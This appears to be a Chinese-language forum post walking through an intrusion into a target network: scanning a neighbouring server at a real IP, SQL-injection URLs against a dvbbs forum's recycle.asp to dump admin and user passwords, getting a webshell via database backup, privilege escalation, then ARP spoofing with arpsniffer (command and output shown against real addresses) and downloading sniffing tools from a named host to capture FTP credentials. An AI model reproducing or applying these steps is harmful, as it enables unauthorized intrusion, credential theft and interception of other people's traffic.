一、踩点:
主站有漏洞的几率太小，就不看了，所有首先检测bct所在的网段，寻找可以突破的2000/2003的机器。
一般都应该找bct附近的ip,不然不在一个交换机内。随便扫一下 比如61.139.126.125，这个服务器可以找到一个可以提权的dvbbs.
二、获得webshell
用工具提前台，用回收站爆后台。转一下linzi的方法：
http://www.xxx.com/bbs/recycle.asp?tablena...dv_bbs1&page=48 爆后台明文密码

http://www.xxx.com/bbs/recycle.asp?tablena...0from%20dv_bbs1 爆管理员密码

http://www.xxx.com/bbs/recycle.asp?tablena...0from%20dv_bbs1 爆用户密码

http://www.xxx.com/bbs/recycle.asp?tablena...0from%20dv_bbs1 爆用户认证密码
进到后台后，备份就可以得到shell。然后老路子，su提权，运气好的时候jet也不用，
登上3389后用小榕WinArpSpoof扫描一下看在不在列表内，如果在就可以用arp欺骗，否则pass.
三、嗅探
进去直接下载arp欺骗包，http://fsb.47555.net/arp.rar,装一下WinPcap_3_1_beta4，个人认为这个版本最为稳定，兼容性好，比3.1的版本都稳定。然后用arpsniffer,arpsniff出错的问题不在讨论之列，详情看linzi的贴：
http://www.eviloctal.com/forum/htm_data/9/0506/12077.html
注意：这里嗅弹得端口最好不要用80等流量大的端口，那样容易导致服务器过载重起，因为我们本来不需要arpsniffer给我什么信息。
C:\>arpsniffer.exe 61.139.126.1 61.139.126.215 5654 c:.txt 0

ARPSniffer 0.5 (Router Inside), by netXeyes, Special Thanks BB
www.netXeyes.com 2002, security at vip dot sina.com

Network Adapter 0: Realtek RTL8139 Family PCI Fast Ethernet NIC


Enable IP Router....OK

Get 61.139.126。1 Hardware Address: 00-11-d8-5e-25-71
Get 61.139.126.215 Hardware Address: 00-50-8d-67-1e-2d
Get 61.139.126.125 Hardware Address: 00-50-8d-67-1d-fd

Spoof 61.139.126.215: Mac of 61.139.126.1 ===> Mac of 61.139.126.125
Spoof 61.139.126.1: Mac of 61.139.126.215 ===> Mac of 61.139.126.125

Begin Sniffer.........


四：分析数据
下载 http://fsb.47555.net/iris.rar 安装后，可以选择嗅探21 也可以通过封包过滤来过滤自己想要得信息，这个就看各人需要了，得到自己需要的数据就行。
然后就可以断开3389，睡一觉，醒来就有内容看了。

以后的提升权限什么的，都不在本次讨论了。